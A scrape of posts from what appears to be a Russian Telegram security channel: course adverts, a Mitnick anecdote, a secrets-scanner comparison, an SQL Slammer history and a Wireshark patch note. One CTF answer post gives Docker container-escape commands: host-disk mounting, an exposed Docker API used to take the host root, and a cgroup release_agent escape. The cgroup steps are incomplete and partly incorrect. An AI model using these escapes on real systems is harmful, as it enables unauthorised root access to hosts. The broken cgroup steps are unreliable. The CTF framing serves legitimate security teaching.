Что он делал:
— крал исходники операционок (Sun, Digital Equipment);
— клонировал мобильные телефоны для бесплатных звонков;
— вскрывал корпоративные сети через доверчивых секретарей.
Правительство держало его 8 месяцев в одиночке БЕЗ суда — якобы он мог "взломать NORAD свистом по телефону". Это была паранойя 90-х, когда никто не понимал, что возможно, а что — голливудская фантастика.
Сейчас ему ставят памятники компании, которые он когда-то взламывал
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6🔥3💯3🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
🤔4🥰2
🤖 AI сейчас на пике — и математика снова в центре внимания.
Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.
Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.
🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.
🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики
👉 Записаться на курс
«На конференции AIJ только и разговоров, что о AI и математике. Ведь в основе генеративных моделей Gen AI лежит фундаментальная математика.»
Одна из топовых экспертов, кто сегодня участвует на AIJ, преподаёт у нас.
Мария Тихонова — PhD по Computer Science, руководитель направления в SberAI и доцент ВШЭ. Она работает с LLM каждый день и объясняет математику так, как она реально применяется в AI.
🔥 Экспресс-курс «Математика для DS» — 8 недель, чтобы закрыть пробелы и уверенно проходить собесы.
🎁 До 30 ноября:
→ скидка 40%
→ курс «Школьная математика» в подарок при оплате
→ бесплатный тест на знание основ математики
👉 Записаться на курс
❤3🥰2🤔1
Правильный ответ: ВСЕ ТРИ работают, но с нюансами!
Почему работает:
Флаг --privileged отключает изоляцию устройств. Контейнер видит все диски хоста.
Эксплойт:
Шаг 1: Смотрим доступные диски
fdisk -l
Видим /dev/sda1 (корень хоста)
Шаг 2: Монтируем
mkdir /mnt/host
mount /dev/sda1 /mnt/host
Шаг 3: Профит!
cat /mnt/host/root/flag.txt
Почему работает:
Если DOCKER_HOST открыт без TLS, можем создавать контейнеры от имени хоста.
Эксплойт:
Проверяем доступ к API
curl https://172.17.0.1:2375/version
Запускаем новый контейнер с volume хоста
docker -H tcp://172.17.0.1:2375 run -v /:/host \
-it alpine chroot /host sh
Теперь мы root на хосте!
cat /root/flag.txt
Почему работает:
Privileged-контейнер может писать в cgroup notify_on_release и выполнить код на хосте.
Эксплойт:
Создаём cgroup
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
cd /tmp/cgrp
Включаем notify_on_release
echo 1 > cgroup.procs
echo 1 > notify_on_release
Пишем скрипт, который выполнится на хосте
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > release_agent
Создаём команду
cat /root/flag.txt > /output
#ctf_challenge
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3🥰3
🔐 Secrets Scanning
🕵️ TruffleHog:
— Сканит Git историю, Docker образы, S3, файловые системы
— 800+ детекторов секретов с верификацией
— Находит токены AWS, GitHub, API ключи с проверкой валидности
— Интеграция в CI/CD, pre-commit hooks
— Но: много false-positive без точной настройки
🔍 Gitleaks:
— Легковесный, быстрый (Go)
— Кастомные regex правила
— SARIF отчеты для DevOps
— Меньше жрет ресурсов
— Но: нет автоматической верификации найденных секретов
❓ Чем ловите утёкшие токены:
❤️ — TruffleHog
🔥 — Gitleaks
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
🐸 Библиотека хакера
#tool_vs_tool
🕵️ TruffleHog:
— Сканит Git историю, Docker образы, S3, файловые системы
— 800+ детекторов секретов с верификацией
— Находит токены AWS, GitHub, API ключи с проверкой валидности
— Интеграция в CI/CD, pre-commit hooks
— Но: много false-positive без точной настройки
🔍 Gitleaks:
— Легковесный, быстрый (Go)
— Кастомные regex правила
— SARIF отчеты для DevOps
— Меньше жрет ресурсов
— Но: нет автоматической верификации найденных секретов
❤️ — TruffleHog
🔥 — Gitleaks
🔹 Курс «Программирование на языке Python»
🔹 Получить консультацию менеджера
🔹 Сайт Академии 🔹 Сайт Proglib
#tool_vs_tool
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2🥰2❤1
🎉 Большая распродажа Proglib Academy — минус 40% на всё!
📚 Выбирай свой курс:
▫️ «Экспресс-курс по математике для DS» — получи фундамент для построения успешной карьеры в Data Science
▫️ «Математика для DS» — для тех, кто хочет уверенно работать с данными;
▫️ «Основы Python» — чтобы начать писать код с нуля;
▫️ «Алгоритмы и структуры данных» — для будущих инженеров;
▫️ «Специалист по ИИ» или «AI-агенты», или «Машинное обучение» — для тех, кто хочет прокачаться в ИИ.
▫️ «Архитектуры и шаблоны проектирования» — чтобы писать гибкий, масштабируемый код как мидл+ разработчик.
▫️ «Основы IT для непрограммистов» — для тех, кто хочет понимать, как устроены технологии, не будучи разработчиком.
🎁 Бонусы ноября:
▫️ Розыгрыш MacBook Pro 14 — купи любой курс и пройди 2 недели обучения до 30 ноября.
▫️ Бесплатный тест по математике — за 5 минут покажет, какие темы стоит подтянуть перед DS.
👉 Выбрать курс со скидкой
📚 Выбирай свой курс:
▫️ «Экспресс-курс по математике для DS» — получи фундамент для построения успешной карьеры в Data Science
▫️ «Математика для DS» — для тех, кто хочет уверенно работать с данными;
▫️ «Основы Python» — чтобы начать писать код с нуля;
▫️ «Алгоритмы и структуры данных» — для будущих инженеров;
▫️ «Специалист по ИИ» или «AI-агенты», или «Машинное обучение» — для тех, кто хочет прокачаться в ИИ.
▫️ «Архитектуры и шаблоны проектирования» — чтобы писать гибкий, масштабируемый код как мидл+ разработчик.
▫️ «Основы IT для непрограммистов» — для тех, кто хочет понимать, как устроены технологии, не будучи разработчиком.
🎁 Бонусы ноября:
▫️ Розыгрыш MacBook Pro 14 — купи любой курс и пройди 2 недели обучения до 30 ноября.
▫️ Бесплатный тест по математике — за 5 минут покажет, какие темы стоит подтянуть перед DS.
👉 Выбрать курс со скидкой
👍3
Please open Telegram to view this post
VIEW IN TELEGRAM
😁9🔥4
Это один из немногих фильмов, где атака строится не на «взломе за 30 секунд», а на реальном OSINT, социальной инженерии и тихой компрометации ПК.
#hollywood_hack
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🥰3
🧨 Что стояло за этим хаосом: краткий разбор SQL Slammer
SQL Slammer стал примером того, как несколько сотен байт кода могут вывести из строя инфраструктуру. Он не шифровал данные и не ломал системы — он перегружал сети.
🔍 Почему он разнёсся за минуты:
Уязвимость находилась в SQL Server (UDP/1434).
UDP не требует соединения: один пакет — и сервер начинает рассылать червя дальше.
Каждая заражённая машина множила нагрузку, пока маршрутизаторы и каналы не начинали «сыпаться».
➡️ Почему падали даже защищённые системы:
Slammer создавал такой объём пакетов, что маршрутизаторы и каналы начинали перегружаться.
Из-за этого выходили из строя:
— банкоматы,
— авиасистемы,
— экстренные службы,
— корпоративные сети,
даже если уязвимости там уже не было.
📌 Slammer стал наглядным примером того, как сетевые атаки могут парализовать инфраструктуру быстрее, чем их успевают обнаружить.
🐸 Библиотека хакера
#zero_day_legends
SQL Slammer стал примером того, как несколько сотен байт кода могут вывести из строя инфраструктуру. Он не шифровал данные и не ломал системы — он перегружал сети.
Уязвимость находилась в SQL Server (UDP/1434).
UDP не требует соединения: один пакет — и сервер начинает рассылать червя дальше.
Каждая заражённая машина множила нагрузку, пока маршрутизаторы и каналы не начинали «сыпаться».
Slammer создавал такой объём пакетов, что маршрутизаторы и каналы начинали перегружаться.
Из-за этого выходили из строя:
— банкоматы,
— авиасистемы,
— экстренные службы,
— корпоративные сети,
даже если уязвимости там уже не было.
#zero_day_legends
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰2👍1
Вышел патч для сетевого анализатора. Для ИБ-специалистов критично.
— 2 уязвимости (RCE/DoS риски при анализе вредоносного трафика)
— 20 багов стабильности
— Обновлены декодеры: HTTP/3, DNS, DTLS, KRB5, SMB, EAPOL-MKA, TCP, SNMP, VLAN
Wireshark анализирует непрове
ренный трафик. Уязвимый анализатор = компрометация рабочей станции ИБ-специалиста.
Ставим:
sudo apt update && sudo apt upgrade wireshark
#patch_notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1🥰1